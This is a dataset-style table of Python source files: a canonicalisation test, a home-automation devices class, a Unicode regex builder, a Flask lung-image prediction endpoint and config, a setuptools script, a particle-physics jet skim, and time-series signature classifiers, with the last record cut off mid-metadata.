blob_id | directory_id | path | content_id | detected_licenses | license_type | repo_name | snapshot_id | revision_id | branch_name | visit_date | revision_date | committer_date | github_id | star_events_count | fork_events_count | gha_license_id | gha_event_created_at | gha_created_at | gha_language | src_encoding | language | is_vendor | is_generated | length_bytes | extension | content | authors | author
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---
a095a2b3730290cc131ea9a3074f0dee215ecd53 | 98c6ea9c884152e8340605a706efefbea6170be5 | /tests/still_torun/test_python_canonicalisation.py | 4a0f0c19de0dd8aad0684d76c27bf0bfb2b73ea9 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 821 | py | from languages.python import PythonProgram
code = '''
print 'hello world'
class A:
    def first_function(self, a):
        a *= 2
        if isinstance(a, int):
            print 'This most definitely gets executed for sure'
        return first_function

    def second_function(b):
        b = 2
        for i in xrange(1000):
            first_function(i)
        b = 2
        for i in xrange(1000):
            first_function(i)
        b = 2
        for i in xrange(1000):
            first_function(i)'''

expected = '''print 's'
class A:
    def f(i, i):
        i *= 2
        if i(i, i):
            print 's'
        return i

    def f(i):
        i = 2
        for i in i(1000):
            i(i)
        i = 2
        for i in i(1000):
            i(i)
        i = 2
        for i in i(1000):
            i(i)'''

program = PythonProgram(code, 'a.py')
assert program.get_canonicalised_program_source.strip() == expected.strip()
| [
"[email protected]"
] | |
5f32c80209f778fec002315adf1586ee30ef6794 | 5a8a0abdd12a767d2dc3a4f4b0f4102ac78e28fc | /lib/h8s/devices.py | 42f81df19eccccfc40447c062aa6d3de95721366 | [
"MIT"
] | permissive | enigmata/h8s-clp | 20fc19dae33acfd1eabd34a21a858bdf0dda6c04 | 4fa8a14bb80f0ac0fedc11d401412c15d2d033d7 | refs/heads/master | 2023-02-12T09:42:14.010522 | 2020-12-31T03:46:24 | 2020-12-31T03:46:24 | 290,272,600 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,337 | py | import json
import os
import sys


class DevicesIOError(Exception):
    def __init__(self, msg):
        self.data = msg


class Devices():
    """
    A devices class is the generic representation of the set of devices that
    is managed by a service.

    Common attributes of a device:
        Name:       Short identifier of the device
        Type:       Kind of device, using a hierarchical format where necessary
                    ('<rootname>/<parentname>/...')
        Room:       Where the device is located in the house
        Location:   Where the device is located in the room
        Active:     Is the device in service
        Properties: Attributes unique to the device type

    NOTE: You do not instantiate the Devices class. A service will specialize
    the Devices class, which is then embedded in this service object.
    """
    def __init__(self, service):
        try:
            f = open(os.path.join(os.path.dirname(sys.modules[service].__file__), 'devices.json'))
            self.devices = json.load(f)
            f.close()
        except IOError:
            self.devices = {}
            raise DevicesIOError('Cannot read devices.json file')

    def get_device(self):
        for dev in self.devices:
            yield self.devices[dev]

    def get_devices(self):
        return self.devices
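
# A minimal subclassing sketch (names below are hypothetical, not part of this
# repository):
#
#     class LightingDevices(Devices):
#         def __init__(self):
#             Devices.__init__(self, 'h8s.lighting')
#
# assuming 'h8s.lighting' is an already-imported service module that ships a
# devices.json file alongside its source.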
| [
"[email protected]"
] | |
db5fd80ae9fc3d3766b0beb5d8bce724f622109a | 14a9667b31cdc846414c906a2e77153189e3feda | /builder.py | 1372a05601a85a6b650be96eea9055c79219eb8d | [] | no_license | gsnedders/py-regexp-builder | 298fdde86ed29aaf7e58f7cab376185a98c8d923 | 8ef65f2bb25f1d5ab701fd73aa4bf40abdcac2ca | refs/heads/master | 2023-05-27T00:44:51.469190 | 2013-04-15T21:05:48 | 2013-04-15T21:05:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,290 | py | import re
import sys

__all__ = ["builder", "enumerable_builder"]


def builder(ranges, **kwargs):
    r"""Build a regexp from an iterable containing codepoints/ranges

    builder takes an iterable containing either (or a mixture) of
    codepoints (given either by a number type or as a unicode string) or
    two-tuples of codepoints, where (x, y) represents a range from U+x to
    U+y inclusive. There is an optional `force` argument, defaulting to None,
    which can force "utf16"/"utf32" regexp generation (note, however, that
    utf32 regexp generation requires a wide build of Python if characters
    outside of the BMP are used).

    For example:

    >>> builder([0x61])
    u'a'
    >>> builder([(0x61, 0x7A)])
    u'[a-z]'
    >>> builder([(0x61, 0x7A), (0x41, 0x5A)])
    u'[A-Za-z]'
    >>> builder([(u"a", u"z"), (0x41, 0x5A)])
    u'[A-Za-z]'
    >>> builder([(u"a", 0x7A), (0x41, 0x5A)])
    u'[A-Za-z]'
    >>> builder([0x10000], force=None) # doctest: +SKIP
    u'\U00010000' if sys.maxunicode == 0x10FFFF else u'\\\ud800\\\udc00'
    >>> builder([0x10000], force="utf16")
    u'\\\ud800\\\udc00'
    >>> builder([0x10000], force="utf32") # doctest: +SKIP
    u'\U00010000'
    """
    ranges = _convertToRanges(ranges)
    ranges = _mergeRanges(ranges)
    return _generateRegexp(ranges, **kwargs)


def enumerable_builder(s, **kwargs):
    r"""Build a regexp from an enumerable iterable based on truthfulness

    `enumerable_builder` takes an iterable and enumerates it (through the
    built-in enumerate(), hence the requirements that it places hold),
    treating the nth value enumerated as U+n and allowing it if the value is
    truthful. There is an optional `force` argument, defaulting to None,
    which can force "utf16"/"utf32" regexp generation (note, however, that
    utf32 regexp generation requires a wide build of Python if characters
    outside of the BMP are used).

    For example:

    >>> enumerable_builder([False, False, True])
    u'\\\x02'
    >>> enumerable_builder([True, True, True, True])
    u'[\x00-\x03]'
    """
    ranges = _inferRanges(s)
    return _generateRegexp(ranges, **kwargs)


def _inferRanges(sequence):
    """Infer ranges from a sequence of boolean values.

    The sequence is taken to represent U+n with its nth codepoint,
    True where allowed and False where not.

    >>> _inferRanges([])
    []
    >>> _inferRanges([False])
    []
    >>> _inferRanges([True])
    [(0, 0)]
    >>> _inferRanges([True, True, True])
    [(0, 2)]
    >>> _inferRanges([True, True, False])
    [(0, 1)]
    >>> _inferRanges([False, True, True])
    [(1, 2)]
    >>> _inferRanges([False, True, False])
    [(1, 1)]
    """
    ranges = []
    start = None
    for i, allow in enumerate(sequence):
        if start is not None and not allow:
            ranges.append((start, i - 1))
            start = None
        elif start is None and allow:
            start = i
    if start is not None:
        ranges.append((start, i))
    return ranges


def _convertToRanges(inputs):
    r"""Convert the public ranges syntax to the internal one

    >>> _convertToRanges([])
    []
    >>> _convertToRanges([0])
    [(0, 0)]
    >>> _convertToRanges([0L])
    [(0, 0)]
    >>> _convertToRanges([u'a'])
    [(97, 97)]
    >>> _convertToRanges([(0x61, 0x7A)])
    [(97, 122)]
    >>> _convertToRanges([(u'a', 0x7A)])
    [(97, 122)]
    >>> _convertToRanges([(u'a', u'z')])
    [(97, 122)]
    >>> _convertToRanges([complex(0)])
    Traceback (most recent call last):
    TypeError: object of type 'complex' has no len()
    """
    new = []
    for input in inputs:
        v = None
        try:
            v = _convertToCodepoint(input)
        except (TypeError, ValueError):
            if isinstance(input, unicode):
                raise
        if v is not None:
            new.append((v, v))
        elif len(input) == 2:
            new.append((_convertToCodepoint(input[0]),
                        _convertToCodepoint(input[1])))
        else:
            raise ValueError("Each range must be of length two")
    return new


def _convertToCodepoint(v):
    """Get a codepoint value from a string or int

    >>> _convertToCodepoint(0)
    0
    >>> _convertToCodepoint(0x20)
    32
    >>> _convertToCodepoint(0x20L)
    32
    >>> _convertToCodepoint(u"\u0000")
    0
    >>> _convertToCodepoint(u"\u0020")
    32
    >>> _convertToCodepoint(u"\U0010FFFF")
    1114111
    >>> _convertToCodepoint(u"\uDBFF\uDFFF")
    1114111
    """
    if isinstance(v, unicode):
        if len(v) == 1:
            return ord(v[0])
        elif len(v) == 2:
            v0 = ord(v[0])
            v1 = ord(v[1])
            if (not 0xD800 <= v0 <= 0xDBFF or
                    not 0xDC00 <= v1 <= 0xDFFF):
                raise ValueError("Two character string must be a surrogate pair")
            return (((v0 & 0x03FF) << 10) | (v1 & 0x3FF)) + 0x10000
        else:
            raise ValueError("String must be a single character or surrogate pair")
    else:
        v = int(v)
        if not (0 <= v <= 0x10FFFF):
            raise ValueError("Integers must represent a Unicode codepoint, "
                             "%X is out of range!" % v)
        return v


def _mergeRanges(ranges):
    """Merge overlapping/adjacent ranges

    >>> _mergeRanges([])
    []
    >>> _mergeRanges([(0,0)])
    [(0, 0)]
    >>> _mergeRanges([(0, 10), (20, 30)])
    [(0, 10), (20, 30)]
    >>> _mergeRanges([(0, 10), (10, 30)])
    [(0, 30)]
    >>> _mergeRanges([(0, 10), (9, 30)])
    [(0, 30)]
    >>> _mergeRanges([(0, 10), (11, 30)])
    [(0, 30)]
    >>> _mergeRanges([(10, 30), (0, 10)])
    [(0, 30)]
    >>> _mergeRanges([(0, 30), (10, 20)])
    [(0, 30)]
    """
    if not ranges:
        return ranges
    ranges = sorted(ranges, cmp=lambda a, b: cmp(a[0], b[0]))
    newRanges = [list(ranges[0])]
    for range in ranges[1:]:
        prev = newRanges[-1]
        if range[0] <= prev[1] + 1:  # If we overlap or are adjacent
            if range[1] > prev[1]:  # If we're not a subset
                prev[1] = range[1]
        else:
            newRanges.append(list(range))
    return map(tuple, newRanges)


def _generateRegexp(ranges, force=None):
    if (sys.maxunicode == 0xFFFF and force is None) or force == "utf16":
        return _generateRegexpUTF16(ranges)
    elif force is None or force == "utf32":
        return _generateRegexpUTF32(ranges)
    else:
        raise ValueError


def _generateRegexpUTF32(ranges):
    r"""Generate regexp for wide Python builds

    >>> _generateRegexpUTF32([])
    u''
    >>> _generateRegexpUTF32([(0, 0)])
    u'\\000'
    >>> _generateRegexpUTF32([(0x28, 0x28)])
    u'\\('
    >>> _generateRegexpUTF32([(0x5b, 0x5b)])
    u'\\['
    >>> _generateRegexpUTF32([(0x61, 0x61)])
    u'a'
    >>> _generateRegexpUTF32([(0x61, 0x62)])
    u'[ab]'
    >>> _generateRegexpUTF32([(0x61, 0x63)])
    u'[abc]'
    >>> _generateRegexpUTF32([(0x61, 0x64)])
    u'[a-d]'
    >>> _generateRegexpUTF32([(0x41, 0x44), (0x61, 0x64)])
    u'[A-Da-d]'
    >>> _generateRegexpUTF32([(0xFFF0, 0x10010)])
    u'[\ufff0-\U00010010]'
    """
    if len(ranges) == 0:
        return u""
    elif len(ranges) == 1 and ranges[0][0] == ranges[0][1]:
        return re.escape(unichr(ranges[0][0]))
    else:
        exp = [u"["]
        for range in ranges:
            escaped0 = _escapeForCharClass(unichr(range[0]))
            if range[0] == range[1]:
                exp.append(escaped0)
            else:
                if range[1] - range[0] >= 3:
                    escaped1 = _escapeForCharClass(unichr(range[1]))
                    exp.append(u"%s-%s" % (escaped0, escaped1))
                else:
                    exp.extend([_escapeForCharClass(unichr(x))
                                for x in xrange(range[0], range[1] + 1)])
        exp.append(u"]")
        return u"".join(exp)


def _generateRegexpUTF16(ranges):
    r"""Generate regexp for narrow Python builds

    >>> _generateRegexpUTF16([])
    u''
    >>> _generateRegexpUTF16([(0, 0)])
    u'\\000'
    >>> _generateRegexpUTF16([(0x28, 0x28)])
    u'\\('
    >>> _generateRegexpUTF16([(0x5b, 0x5b)])
    u'\\['
    >>> _generateRegexpUTF16([(0x61, 0x61)])
    u'a'
    >>> _generateRegexpUTF16([(0x61, 0x62)])
    u'[ab]'
    >>> _generateRegexpUTF16([(0x61, 0x63)])
    u'[abc]'
    >>> _generateRegexpUTF16([(0x61, 0x64)])
    u'[a-d]'
    >>> _generateRegexpUTF16([(0x41, 0x44), (0x61, 0x64)])
    u'[A-Da-d]'
    >>> _generateRegexpUTF16([(0xFFF0, 0xFFFF)])
    u'[\ufff0-\uffff]'
    >>> _generateRegexpUTF16([(0xFFF0, 0x10010)])
    u'(?:[\ufff0-\uffff]|\\\ud800[\udc00-\udc10])'
    >>> _generateRegexpUTF16([(0x10000, 0x10000)])
    u'\\\ud800\\\udc00'
    >>> _generateRegexpUTF16([(0x10000, 0x10010)])
    u'\\\ud800[\udc00-\udc10]'
    >>> _generateRegexpUTF16([(0x10300, 0x104FF)])
    u'(?:\\\ud800[\udf00-\udfff]|\\\ud801[\udc00-\udcff])'
    >>> _generateRegexpUTF16([(0x10300, 0x108FF)])
    u'(?:\\\ud800[\udf00-\udfff]|\\\ud801[\udc00-\udfff]|\\\ud802[\udc00-\udcff])'
    >>> _generateRegexpUTF16([(0x10300, 0x10CFF)])
    u'(?:\\\ud800[\udf00-\udfff]|[\ud801\ud802][\udc00-\udfff]|\\\ud803[\udc00-\udcff])'
    >>> _generateRegexpUTF16([(0x10300, 0x110FF)])
    u'(?:\\\ud800[\udf00-\udfff]|[\ud801\ud802\ud803][\udc00-\udfff]|\\\ud804[\udc00-\udcff])'
    >>> _generateRegexpUTF16([(0x10000, 0x10FFFF)])
    u'[\ud800-\udbff][\udc00-\udfff]'
    """
    segments = []
    bmp = []
    nonbmp = []
    for range in ranges:
        if range[1] <= 0xFFFF:
            bmp.append(range)
        elif range[0] <= 0xFFFF:
            bmp.append((range[0], 0xFFFF))
            nonbmp.append((0x10000, range[1]))
        else:
            nonbmp.append(range)
    if bmp:
        segments.append(_generateRegexpUTF32(bmp))
    for range in nonbmp:
        starthigh, startlow = _toSurrogate(range[0])
        endhigh, endlow = _toSurrogate(range[1])
        midstart, midend = (starthigh + 1 if startlow != 0xDC00 else starthigh,
                            endhigh - 1 if endlow != 0xDFFF else endhigh)
        if starthigh == endhigh:
            segments.append(re.escape(unichr(starthigh)) +
                            _generateRegexpUTF32([(startlow, endlow)]))
        else:
            if starthigh != midstart:
                segments.append(re.escape(unichr(starthigh)) +
                                _generateRegexpUTF32([(startlow, 0xDFFF)]))
            if midstart <= midend:
                segments.append(_generateRegexpUTF32([(midstart, midend)]) +
                                u"[\uDC00-\uDFFF]")
            if endhigh != midend:
                segments.append(re.escape(unichr(endhigh)) +
                                _generateRegexpUTF32([(0xDC00, endlow)]))
    if len(segments) > 1:
        return u"(?:%s)" % u"|".join(segments)
    elif segments:
        return segments[0]
    else:
        return u""


_charsNeedEscapeForCharClass = frozenset([
    u"\\",
    u"]",
    u"-",
    u"^"])


def _escapeForCharClass(char):
    if char in _charsNeedEscapeForCharClass:
        return u"\\" + char
    else:
        return char


def _toSurrogate(char):
    assert 0xFFFF < char <= 0x10FFFF
    char = char - 0x10000
    return ((char >> 10) + 0xD800, (char & 0x3FF) + 0xDC00)
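
# Usage sketch (Python 2; the range chosen here is ASCII letters, an
# arbitrary example):
#
#     pattern = re.compile(u"^(?:%s)+$" % builder([(0x41, 0x5A), (0x61, 0x7A)]))
#     assert pattern.match(u"AbcXYZ")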
| [
"[email protected]"
] | |
ecf10d6c299852de4375edc6289f69a047edaf28 | aaf85f28d1c696ccd2859381c86830654b173e9b | /prediction_app.py | 065b4d91430021bb52b2b3ca1f8282897f572e05 | [] | no_license | MohamedArif20091999/Predicting-Lung-Disease | 997958094e8eef27219ea3da98b5542b2afbf3b9 | a6b675f3fdfa740dcbfae10b6268c0f1e7477b68 | refs/heads/master | 2021-01-04T17:43:35.822964 | 2020-08-17T07:13:54 | 2020-08-17T07:13:54 | 240,691,904 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,297 | py | import base64
import numpy as np
import io
from PIL import Image
import keras
from keras import backend as K
from keras.models import Sequential
from keras.models import load_model
from keras.preprocessing.image import ImageDataGenerator
from keras.preprocessing.image import img_to_array
from flask import request
from flask import jsonify
from flask import Flask

app = Flask(__name__)


def get_model():
    global model
    model = load_model('modvgg.h5')
    print(" * Model loaded!")


def preprocess_image(image, target_size):
    if image.mode != "RGB":
        image = image.convert("RGB")
    image = image.resize(target_size)
    image = img_to_array(image)
    image = np.expand_dims(image, axis=0)
    image /= 255
    return image


print(" * Loading Keras model...")
get_model()


@app.route("/predict", methods=["POST"])
def predict():
    message = request.get_json(force=True)
    encoded = message['image']
    decoded = base64.b64decode(encoded)
    image = Image.open(io.BytesIO(decoded))
    processed_image = preprocess_image(image, target_size=(224, 224))
    prediction = model.predict(processed_image).tolist()
    response = {
        'prediction': {
            'neg': prediction[0][1],
            'pos': prediction[0][0]
        }
    }
    return jsonify(response)
| [
"[email protected]"
] | |
34bc327a98ac4e6aa7676a9f6be58747cbbfb705 | b0b8d2d7c875733bff4cddc26a3a4aaa57befd45 | /config.py | 9b68e5105acf09eb9ac5da64a8750ca1af1a5173 | [
"MIT"
] | permissive | phcavelar/ganban | 45fe8c82ba3984543d325534022ee90de2d6ec65 | 95c19fbc94cabc90d052a9dd210e34fd31bf0bad | refs/heads/master | 2020-07-03T03:38:11.592861 | 2019-08-17T14:24:11 | 2019-08-17T14:24:11 | 201,772,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | import os
basedir = os.path.abspath(os.path.dirname(__file__))


class Config(object):
    SECRET_KEY = os.environ.get("SECRET_KEY") or "you-will-never-guess"
    SQLALCHEMY_DATABASE_URI = os.environ.get("DATABASE_URL") or (
        "sqlite:///" + os.path.join(basedir, "graphkanban.db")
    )
    SQLALCHEMY_TRACK_MODIFICATIONS = False
| [
"[email protected]"
] | |
e441d5ae8986892752ad0e39f2ad8c244be3ce10 | bf4e8251ba481bdc68a3dd3a605434b83a726c15 | /venv/Scripts/easy_install-3.7-script.py | a4cc65edde6e16ebd4f3f04c2d9866e116730b06 | [] | no_license | VinayNCLK/PythonSeleniumPrograms | 2e1715bd429651462a14dd31a7b2ba639df724d0 | 6038f469a2cbcf20b6dd410697ca1dae4ccb413b | refs/heads/master | 2020-07-05T02:10:51.688677 | 2019-08-15T07:07:18 | 2019-08-15T07:07:18 | 202,491,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | #!C:\Users\shekar\PycharmProjects\Selenium_July\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.7')()
    )
| [
"[email protected]"
] | |
0835ebeb7880f30c8e6d23af65dcc6f41436f923 | f74522d780406c92139e991c36a50b28a9d049eb | /python/modules/JetResSkim.py | 5a1ec0dc05eafeb762991743f25f8bb73488d41d | [] | no_license | mkilpatr/NanoSUSY-tools | cfe1e08742a051d5fd04adabc64add8a5829c32d | 177f65b2e1ad659ec7cab1c4af8c0fda82f48fab | refs/heads/master | 2022-01-14T07:40:40.009894 | 2020-08-13T19:15:47 | 2020-08-13T19:15:47 | 162,190,651 | 0 | 1 | null | 2022-06-09T13:41:36 | 2018-12-17T21:14:23 | Python | UTF-8 | Python | false | false | 4,479 | py | #!/usr/bin/env python
import os, sys
import ROOT
import math
import numpy as np
from array import array
ROOT.PyConfig.IgnoreCommandLineOptions = True
from importlib import import_module
from PhysicsTools.NanoAODTools.postprocessing.framework.datamodel import Collection, Object
from PhysicsTools.NanoAODTools.postprocessing.framework.eventloop import Module
from PhysicsTools.NanoAODTools.postprocessing.tools import deltaPhi, deltaR, closest
from PhysicsTools.NanoAODTools.postprocessing.framework.treeReaderArrayTools import *
from rootpy.tree import Tree, TreeModel, IntCol, FloatArrayCol


class JetResSkim(Module):
    def __init__(self, era):
        self.era = era

    def beginJob(self):
        pass

    def endJob(self):
        pass

    def beginFile(self, inputFile, outputFile, inputTree, wrappedOutputTree):
        self.out = wrappedOutputTree
        self.out.branch("weight",     "F")
        self.out.branch("genjetpt",   "F")
        self.out.branch("genjeteta",  "F")
        self.out.branch("recojetpt",  "F")
        self.out.branch("genjetrank", "I")
        self.out.branch("flavor",     "I")
        self.out.branch("rechempt",   "F")
        self.out.branch("genhempt",   "F")

    def PassEventFilter(self, flags):
        # https://twiki.cern.ch/twiki/bin/viewauth/CMS/MissingETOptionalFiltersRun2#2016_data
        passEventFilter = None
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2016 ~~~~~
        if self.era == "2016":
            ## Common filters
            passEventFilter = flags.goodVertices and flags.HBHENoiseFilter and \
                flags.HBHENoiseIsoFilter and flags.EcalDeadCellTriggerPrimitiveFilter \
                and flags.BadPFMuonFilter and flags.BadChargedCandidateFilter  # Post 2016 ICHEP
            # and flags.BadPFMuonSummer16Filter and flags.BadChargedCandidateSummer16Filter
            ## Only data
        #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2017 ~~~~~
        if self.era == "2017" or self.era == "2018":
            ## Common filters
            passEventFilter = flags.goodVertices and flags.HBHENoiseFilter and \
                flags.HBHENoiseIsoFilter and flags.EcalDeadCellTriggerPrimitiveFilter \
                and flags.BadPFMuonFilter and flags.BadChargedCandidateFilter \
                and flags.ecalBadCalibFilter  ## Need to double check whether is outdated
            ## Only data
        return passEventFilter

    def PassJetID(self, jets):
        # https://twiki.cern.ch/twiki/bin/view/CMS/JetID#Recommendations_for_13_TeV_2017
        # For 2016, loose and tight ID is the same: https://twiki.cern.ch/twiki/bin/view/CMS/JetID13TeVRun2016
        # For 2017, only tight ID available: https://twiki.cern.ch/twiki/bin/view/CMS/JetID13TeVRun2017
        # Select jet pt > 30GeV, which is used in jet ID study:
        # https://indico.cern.ch/event/592313/contributions/2398387/attachments/1384663/2106630/JetID_JMARmeeting_7_12_2016.pdf
        jetIDs = [j.jetId & 0b010 for j in jets if j.pt > 30]
        return (0 not in jetIDs)

    def analyze(self, event):
        jets = Collection(event, "Jet")
        genjets = Collection(event, "GenJet")
        flags = Object(event, "Flag")

        weight = event.genWeight
        eventNum = event.event

        PassJetID = self.PassJetID(jets)
        PassFilter = self.PassEventFilter(flags) and PassJetID

        if PassFilter and PassJetID:
            for gJ in xrange(len(genjets)):
                gJet = genjets[gJ]
                if gJet.pt < 20: continue
                rJet = 0
                for iR in xrange(len(jets)):
                    if jets[iR].genJetIdx != gJ: continue
                    rJet = jets[iR]
                    break
                self.out.fillBranch("weight", weight)
                self.out.fillBranch("genjetpt", gJet.pt)
                self.out.fillBranch("genjeteta", gJet.eta)
                self.out.fillBranch("recojetpt", rJet.pt if rJet != 0 else 9.5)
                self.out.fillBranch("genjetrank", min(gJ, 250))
                self.out.fillBranch("flavor", gJet.partonFlavour)
                if (gJet.eta > -2.8 and gJet.eta < -1.6 and gJet.phi > -1.37 and gJet.phi < -1.07):
                    self.out.fillBranch("genhempt", gJet.pt)
                else:
                    self.out.fillBranch("genhempt", 0)
                if rJet != 0:
                    if (rJet.eta > -2.8 and rJet.eta < -1.6 and rJet.phi > -1.37 and rJet.phi < -1.07):
                        self.out.fillBranch("rechempt", rJet.pt)
                    else:
                        self.out.fillBranch("rechempt", 0)
                else:
                    self.out.fillBranch("rechempt", 0)
                self.out.fill()
        return True
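
# A driver sketch (file name and era are placeholders; assumes nanoAOD-tools'
# PostProcessor is available in the environment):
#
#     from PhysicsTools.NanoAODTools.postprocessing.framework.postprocessor import PostProcessor
#     p = PostProcessor(".", ["nano.root"], modules=[JetResSkim("2017")])
#     p.run()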
| [
"[email protected]"
] | |
1b9059dbcb69917eee809907d67f618309696c29 | 5659d136b70206b0a6caba529803ff684db2b82b | /classifiers.py | ae55eb72e02d5402bcc15edc39e131b82fc23d0e | [
"MIT"
] | permissive | zhy0/sig-tsc | 8d13916a4cff19505c12dd6ff64d4acc7ce72954 | a9d01760233f0fbb25d53a73225e9ee7bf53e1b3 | refs/heads/master | 2023-09-01T16:47:43.098663 | 2019-07-10T12:20:00 | 2019-07-10T12:20:00 | 192,418,597 | 1 | 0 | MIT | 2023-08-14T21:48:31 | 2019-06-17T21:03:57 | Jupyter Notebook | UTF-8 | Python | false | false | 6,246 | py | import numpy as np
from iisignature import sig, logsig, prepare
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.preprocessing import StandardScaler, FunctionTransformer
from sklearn.base import BaseEstimator, TransformerMixin, clone
from sklearn.ensemble import VotingClassifier
from sklearn.model_selection import cross_val_score


class SigFeatures(BaseEstimator, TransformerMixin):
    def __init__(self, level=3):
        self.level = level

    def fit(self, X, y=None):
        return self

    def transform(self, X):
        return np.array([sig(x, self.level) for x in X])


class LogSigFeatures(BaseEstimator, TransformerMixin):
    def __init__(self, level=3, dim=2):
        self.level = level
        self.dim = dim

    def fit(self, X, y=None):
        return self

    def transform(self, X):
        prepared = prepare(self.dim, self.level)
        return np.array([logsig(x, prepared) for x in X])


class Embedding(BaseEstimator, TransformerMixin):
    def fit(self, X, y=None):
        return self

    def transform_instance(self, X):
        raise NotImplementedError

    def transform(self, X):
        return [self.transform_instance(x) for x in X]


class LeadLag(Embedding):
    def transform_instance(self, X):
        lead = np.transpose([X, X]).flatten()[1:]
        lag = np.transpose([X, X]).flatten()[0:-1]
        return np.transpose([lead, lag])


class TimeIndexed(Embedding):
    def __init__(self, init_time=0., total_time=1.):
        self.init_time = init_time
        self.total_time = total_time

    def fit(self, X, y=None):
        return self

    def transform_instance(self, X):
        t = np.linspace(self.init_time, self.init_time + 1, len(X))
        return np.c_[t, X]


class TimeJoined(Embedding):
    def transform_instance(self, X):
        Y = X.transpose()
        t = np.transpose([Y[0], Y[0]]).flatten()
        Z = np.insert(np.transpose([Y[1], Y[1]]).flatten()[0:-1], 0, 0)
        return np.transpose([t, Z])


class FlatCOTE(VotingClassifier):
    def __init__(self, estimators, cv=3, n_jobs=None, flatten_transform=True):
        super().__init__(estimators, voting='soft', weights=None, n_jobs=n_jobs,
                         flatten_transform=flatten_transform)
        self.cv = cv

    def fit(self, X, y):
        super().fit(X, y)
        self.weights = [cross_val_score(clf, X, y, cv=self.cv).mean()
                        for clf in self.estimators_]
        return self


def create_concatenator(clf, sig_type='logsig', level=3, dim=2):
    if sig_type == 'logsig':
        if not dim:
            raise ValueError("dim is required for logsig features")
        sig_features = LogSigFeatures(level=level, dim=dim)
    else:
        sig_features = SigFeatures(level=level)

    leadlag = Pipeline([
        ('leadlag', LeadLag()),
        ('signature', sig_features),
        ('scale', StandardScaler()),
    ])
    timeindexed = Pipeline([
        ('timeind', TimeIndexed()),
        ('signature', sig_features),
        ('scale', StandardScaler()),
    ])
    timejoined = Pipeline([
        ('timeind', TimeIndexed()),
        ('timejoin', TimeJoined()),
        ('signature', sig_features),
        ('scale', StandardScaler()),
    ])

    partial_sum = lambda X: np.cumsum(X, axis=1)
    ps_leadlag = Pipeline([
        ('partialsum', FunctionTransformer(partial_sum, validate=False)),
        ('leadlag', LeadLag()),
        ('signature', sig_features),
        ('scale', StandardScaler()),
    ])
    ps_timeindexed = Pipeline([
        ('partialsum', FunctionTransformer(partial_sum, validate=False)),
        ('timeind', TimeIndexed()),
        ('signature', sig_features),
        ('scale', StandardScaler()),
    ])
    ps_timejoined = Pipeline([
        ('partialsum', FunctionTransformer(partial_sum, validate=False)),
        ('timeind', TimeIndexed()),
        ('timejoin', TimeJoined()),
        ('signature', sig_features),
        ('scale', StandardScaler()),
    ])

    union = FeatureUnion([
        ('leadlag', leadlag),
        ('timejoined', timejoined),
        ('timeindexed', timeindexed),
        ('ps_leadlag', ps_leadlag),
        ('ps_timejoined', ps_timejoined),
        ('ps_timeindexed', ps_timeindexed),
    ])
    return Pipeline([
        ('union', union),
        ('classifier', clf)
    ])


def create_vote_clf(clf, level=3, voter=FlatCOTE, **vote_args):
    leadlag = Pipeline([
        ('leadlag', LeadLag()),
        ('signature', SigFeatures(level=level)),
        ('scale', StandardScaler()),
        ('classifier', clone(clf)),
    ])
    timeindexed = Pipeline([
        ('timeind', TimeIndexed()),
        ('signature', SigFeatures(level=level)),
        ('scale', StandardScaler()),
        ('classifier', clone(clf)),
    ])
    timejoined = Pipeline([
        ('timeind', TimeIndexed()),
        ('timejoin', TimeJoined()),
        ('signature', SigFeatures(level=level)),
        ('scale', StandardScaler()),
        ('classifier', clone(clf)),
    ])

    partial_sum = lambda X: np.cumsum(X, axis=1)
    ps_leadlag = Pipeline([
        ('partialsum', FunctionTransformer(partial_sum, validate=False)),
        ('leadlag', LeadLag()),
        ('signature', SigFeatures(level=level)),
        ('scale', StandardScaler()),
        ('classifier', clone(clf)),
    ])
    ps_timeindexed = Pipeline([
        ('partialsum', FunctionTransformer(partial_sum, validate=False)),
        ('timeind', TimeIndexed()),
        ('signature', SigFeatures(level=level)),
        ('scale', StandardScaler()),
        ('classifier', clone(clf)),
    ])
    ps_timejoined = Pipeline([
        ('partialsum', FunctionTransformer(partial_sum, validate=False)),
        ('timeind', TimeIndexed()),
        ('timejoin', TimeJoined()),
        ('signature', SigFeatures(level=level)),
        ('scale', StandardScaler()),
        ('classifier', clone(clf)),
    ])

    vote = voter([
        ('leadlag', leadlag),
        ('timejoined', timejoined),
        ('timeindexed', timeindexed),
        ('ps_leadlag', ps_leadlag),
        ('ps_timejoined', ps_timejoined),
        ('ps_timeindexed', ps_timeindexed),
    ], **vote_args)
    return vote
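
# Usage sketch (the base estimator is an arbitrary choice; X_* are lists of
# equal-length 1-D series, y_* the class labels -- all hypothetical names):
#
#     from sklearn.ensemble import RandomForestClassifier
#     clf = create_vote_clf(RandomForestClassifier(n_estimators=100), level=3)
#     clf.fit(X_train, y_train)
#     print(clf.score(X_test, y_test))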
| [
"[email protected]"
] | |
c51fac35f4ea046bd92d852442d74a099b9695a8 | aa245f4e900ab0f27eee9b0fb2d7c9f7d4172269 | /tests/test_block.py | 2bf653c0f7587c82d81d0fcc518b8d98e334dd59 | [
"MIT"
